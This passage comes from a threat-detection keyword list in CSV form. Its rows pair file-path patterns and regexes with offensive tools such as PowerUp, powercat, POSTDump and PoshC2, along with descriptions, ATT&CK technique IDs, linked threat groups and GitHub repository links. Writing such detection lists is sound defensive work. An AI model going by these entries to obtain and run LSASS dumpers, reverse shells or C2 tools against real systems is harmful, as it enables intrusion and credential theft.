T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9784" "*/posh-project*",".{0,1000}\/posh\-project.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9785" "*/posh-server*",".{0,1000}\/posh\-server.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9786" "*/posh-service*",".{0,1000}\/posh\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9787" "*/posh-stop-service*",".{0,1000}\/posh\-stop\-service.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9788" "*/posh-update*",".{0,1000}\/posh\-update.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral 
Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","9789" "*/post_exploitation*",".{0,1000}\/post_exploitation.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9790" "*/PostDump.exe*",".{0,1000}\/PostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","9791" "*/POSTDump.git*",".{0,1000}\/POSTDump\.git.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","9792" "*/postLegit/grkg*",".{0,1000}\/postLegit\/grkg.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","9793" "*/postLegit/qhwl*",".{0,1000}\/postLegit\/qhwl.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","9794" "*/PotentiallyCrackableAccounts.ps1*",".{0,1000}\/PotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9795" "*/PowerBreach.ps1*",".{0,1000}\/PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","9796" "*/PowerBruteLogon*",".{0,1000}\/PowerBruteLogon.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 
- TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","9797" "*/powercat.git*",".{0,1000}\/powercat\.git.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","9798" "*/powercat.ps1",".{0,1000}\/powercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","9799" "*/powercat.ps1*",".{0,1000}\/powercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","9800" "*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","9801" "*/PowerExtract.git*",".{0,1000}\/PowerExtract\.git.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","N/A","2","117","14","2025-03-28T10:49:43Z","2021-12-11T15:24:44Z","9802" "*/powerfun.ps1*",".{0,1000}\/powerfun\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","9803" "*/powerglot/*",".{0,1000}\/powerglot\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","9804" "*/powerkatz.dll*",".{0,1000}\/powerkatz\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","9805" "*/powerkatz_x64.dll*",".{0,1000}\/powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - 
T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","9806" "*/powerkatz_x86.dll*",".{0,1000}\/powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","9807" "*/Powerless.dll*",".{0,1000}\/Powerless\.dll.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","1","N/A","N/A","10","4","N/A","N/A","N/A","N/A","9808" "*/powerloader.py*",".{0,1000}\/powerloader\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - 
Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9809" "*/PowerLurk.git*",".{0,1000}\/PowerLurk\.git.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","9810" "*/PowerLurk.ps1*",".{0,1000}\/PowerLurk\.ps1.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","9811" "*/Powermad.git*",".{0,1000}\/Powermad\.git.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","N/A","10","1303","181","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z","9812" "*/Powermad.ps1*",".{0,1000}\/Powermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","9813" "*/PowerPick.exe*",".{0,1000}\/PowerPick\.exe.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell 
functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","9814" "*/Powerpreter.psm1*",".{0,1000}\/Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9815" "*/PowerProxy.git*",".{0,1000}\/PowerProxy\.git.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","9816" "*/PowerProxy.ps1*",".{0,1000}\/PowerProxy\.ps1.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","1","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","9817" "*/power-pwn.git*",".{0,1000}\/power\-pwn\.git.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","9818" "*/PowerSCCM.git*",".{0,1000}\/PowerSCCM\.git.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM 
- PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","9819" "*/PowerSharpPack.git*",".{0,1000}\/PowerSharpPack\.git.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","9820" "*/PowerShdll.exe*",".{0,1000}\/PowerShdll\.exe.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","1","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","9821" "*/powershell/process_injection/*",".{0,1000}\/powershell\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","9822" "*/powershell_executor/*.go*",".{0,1000}\/powershell_executor\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","9823" 
"*/PowershellKerberos.git*",".{0,1000}\/PowershellKerberos\.git.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","9824" "*/PowerShellRunner.git*",".{0,1000}\/PowerShellRunner\.git.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","1","N/A","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","9825" "*/Powershell-Scripts-for-Hackers-and-Pentesters*",".{0,1000}\/Powershell\-Scripts\-for\-Hackers\-and\-Pentesters.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","9826" "*/PowershellTools.git*",".{0,1000}\/PowershellTools\.git.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","9827" "*/PowerShx.git*",".{0,1000}\/PowerShx\.git.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","9828" "*/PowerTools.ps1*",".{0,1000}\/PowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","9829" "*/PowerUp.ps1*",".{0,1000}\/PowerUp\.ps1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","1","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","9830" "*/PowerUp.ps1*",".{0,1000}\/PowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","9831" "*/PowerUpSQL.ps1*",".{0,1000}\/PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9832" "*/PowerUpSQL.ps1*",".{0,1000}\/PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9833" "*/PowerView.cna*",".{0,1000}\/PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda 
